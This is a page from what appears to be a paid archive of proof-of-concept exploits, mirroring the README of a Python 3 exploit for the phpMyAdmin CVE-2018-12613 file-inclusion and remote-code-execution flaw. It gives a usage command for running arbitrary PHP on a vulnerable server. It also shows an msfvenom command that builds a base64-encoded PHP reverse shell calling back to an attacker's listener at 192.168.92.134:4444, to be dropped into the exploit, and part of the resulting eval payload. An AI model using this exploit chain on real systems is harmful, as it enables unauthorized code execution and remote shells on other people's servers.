Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-12613 PoC — phpMyAdmin 安全漏洞

Source
https://github.com/ivanitlearning/CVE-2018-12613
Associated Vulnerability
Title:phpMyAdmin 安全漏洞 (CVE-2018-12613)
Description:An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
Description
Modified standalone exploit ported for Python 3
Readme
# CVE-2018-12613
Modified standalone exploit ported to Python 3. Tested on Python 3.7.3, phpMyAdmin 4.8.1 running on Ubuntu 16.04 
Works on Linux only. Original exploit [by SSD](https://github.com/ssd-secure-disclosure/advisories/tree/master/SSD%20Advisory%20-%203700). All credits to them.

## Changes made
1. Added function to exit if provided phpMyAdmin username/password is correct
2. Added function to check if version is vulnerable (4.8.0 or 4.8.1)
3. Converted variables to either bytes or strings strictly; Python 3 disallows mixing. See [this](https://portingguide.readthedocs.io/en/latest/strings.html).

## Usage:
`python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”`

Results of php code stored in `results.html`

### For reverse shell
```
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
```
Use the `msfvenom` php payload in place of `phpcredits();` above

`root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php`
> eval(base64_decode(ICAg...gfQo));
File Snapshot

 [4.0K]  /data/pocs/8da2d7d7ddb845171ed7272c3cecf3963c285736
├── [4.4K]  CVE-2018-12613.py
└── [1.3K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →